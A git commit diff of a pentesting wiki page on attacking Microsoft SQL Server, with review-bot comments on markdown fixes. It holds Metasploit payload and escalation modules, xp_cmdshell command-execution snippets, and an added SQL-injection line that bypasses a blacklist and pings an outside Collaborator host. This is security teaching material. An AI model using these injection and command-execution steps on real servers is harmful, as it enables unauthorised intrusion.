mirror of
https://github.com/carlospolop/hacktricks.git
synced 2023-12-14 19:12:55 +01:00
GitBook: [#2811] mssql trick
This commit is contained in:
parent
3896ea2eb9
commit
b150f0adc0
|
@ -10,8 +10,8 @@ If you want to **share some tricks with the community** you can also submit **pu
|
|||
|
||||
## Basic Information
|
||||
|
||||
**Microsoft SQL Server** is a [relational database management system](https://en.wikipedia.org/wiki/Relational_database_management_system) developed by [Microsoft](https://en.wikipedia.org/wiki/Microsoft). As a [database server](https://en.wikipedia.org/wiki/Database_server), it is a [software product](https://en.wikipedia.org/wiki/Software_product) with the primary function of storing and retrieving data as requested by other [software applications](https://en.wikipedia.org/wiki/Software_application)—which may run either on the same computer or on another computer across a network (including the Internet).\
|
||||
From [wikipedia](https://en.wikipedia.org/wiki/Microsoft_SQL_Server).
|
||||
**Microsoft SQL Server** is a [relational database management system](https://en.wikipedia.org/wiki/Relational\_database\_management\_system) developed by [Microsoft](https://en.wikipedia.org/wiki/Microsoft). As a [database server](https://en.wikipedia.org/wiki/Database\_server), it is a [software product](https://en.wikipedia.org/wiki/Software\_product) with the primary function of storing and retrieving data as requested by other [software applications](https://en.wikipedia.org/wiki/Software\_application)—which may run either on the same computer or on another computer across a network (including the Internet).\
|
||||
From [wikipedia](https://en.wikipedia.org/wiki/Microsoft\_SQL\_Server).
|
||||
|
||||
**Default port:** 1433
|
||||
|
||||
|
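Review bot: the only change in this hunk is backslash-escaping the underscores inside link destinations (`Relational\_database\_management\_system`, `Microsoft\_SQL\_Server`); CommonMark processes backslash escapes in link destinations, so this renders the same, but the unescaped form is the conventional one and avoids renderers that keep the backslash literal. While this block is being touched, the `**Default port:** 1433` line would be more useful if it said the port is TCP and that named instances not listening on 1433 are located through the SQL Server Browser service on UDP 1434.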
@ -82,7 +82,7 @@ msf> use exploit/windows/mssql/mssql_payload #Uploads and execute a payload
|
|||
msf> use windows/manage/mssql_local_auth_bypass
|
||||
```
|
||||
|
||||
### \*\*\*\*[**Brute force**](../brute-force.md#sql-server)\*\*\*\*
|
||||
### [**Brute force**](../brute-force.md#sql-server)
|
||||
|
||||
## Tricks
|
||||
|
||||
|
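Review bot: removing the stray `\*\*\*\*` around the heading link is the right fix; the remaining `### [**Brute force**](../brute-force.md#sql-server)` still nests bold inside a link inside a heading, which adds nothing visually, so `### [Brute force](../brute-force.md#sql-server)` is the cleaner form.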
@ -102,6 +102,9 @@ sp_configure 'xp_cmdshell', '1'
|
|||
RECONFIGURE
|
||||
# Quickly check what the service account is via xp_cmdshell
|
||||
EXEC master..xp_cmdshell 'whoami'
|
||||
|
||||
# Bypass blackisted "EXEC xp_cmdshell"
|
||||
‘; DECLARE @x AS VARCHAR(100)=’xp_cmdshell’; EXEC @x ‘ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net’ —
|
||||
```
|
||||
|
||||
### NTLM Service Hash gathering
|
||||
|
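Review bot: the added line has a typo, `blackisted` should be `blacklisted`, and it uses typographic quotes (‘ ’) and an em dash (—) where T-SQL needs straight single quotes and `--` for the trailing comment, so the snippet is not valid as pasted. The hostname `k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net` is one tester's Collaborator instance and should be a placeholder such as `<your-collaborator-host>`. Both `#` comment lines (the existing `# Quickly check ...` context and the new `# Bypass ...`) sit in a block whose other lines (`sp_configure 'xp_cmdshell', '1'`, `RECONFIGURE`, `EXEC master..xp_cmdshell 'whoami'`) are T-SQL, where `#` is not a comment delimiter; use `--` so the block stays runnable.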
@ -117,11 +120,11 @@ msf> use auxiliary/admin/mssql/mssql_ntlm_stealer
|
|||
|
||||
### Abusing MSSQL trusted Links
|
||||
|
||||
\*\*\*\*[**Read this post**](../windows/active-directory-methodology/mssql-trusted-links.md) **to find more information about how to abuse this feature**
|
||||
[**Read this post**](../windows/active-directory-methodology/mssql-trusted-links.md) **to find more information about how to abuse this feature**
|
||||
|
||||
### **Read files executing scripts (Python and R)**
|
||||
|
||||
MSSQL could allow you to execute **scripts in Python and/or R**. These code will be executed by a **different user** than the one using **xp_cmdshell** to execute commands.
|
||||
MSSQL could allow you to execute **scripts in Python and/or R**. These code will be executed by a **different user** than the one using **xp\_cmdshell** to execute commands.
|
||||
|
||||
Example trying to execute a **'R'** _"Hellow World!"_ **not working**:
|
||||
|
||||
|
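Review bot: `These code will be executed by a **different user**` should read `This code will be executed by a **different user**`, and `_"Hellow World!"_` has a typo for `Hello World!`. Dropping the stray `\*\*\*\*` before the trusted-links link is fine, and the `xp\_cmdshell` escape inside bold text is consistent with the rest of the GitBook export.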
@ -143,9 +146,9 @@ print(sys.version)
|
|||
GO
|
||||
```
|
||||
|
||||
### From db_owner to sysadmin
|
||||
### From db\_owner to sysadmin
|
||||
|
||||
[If you have the](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [**credentials of a db_owner user**](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/)[, you can become](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [**sysadmin**](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [and](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [**execute commands**](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/)
|
||||
[If you have the](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [**credentials of a db\_owner user**](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/)[, you can become](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [**sysadmin**](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [and](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [**execute commands**](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/)
|
||||
|
||||
```bash
|
||||
msf> use auxiliary/admin/mssql/mssql_escalate_dbowner
|
||||
|
|
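Review bot: the db_owner sentence is split into six consecutive links that all point at the same URL (https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/), with the spaces between them outside any link, so it renders as a chain of separately underlined fragments; collapse it into a single link, e.g. `[If you have the credentials of a **db_owner** user, you can become **sysadmin** and execute commands](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/)`. The `db\_owner` escape in the heading is harmless but unnecessary.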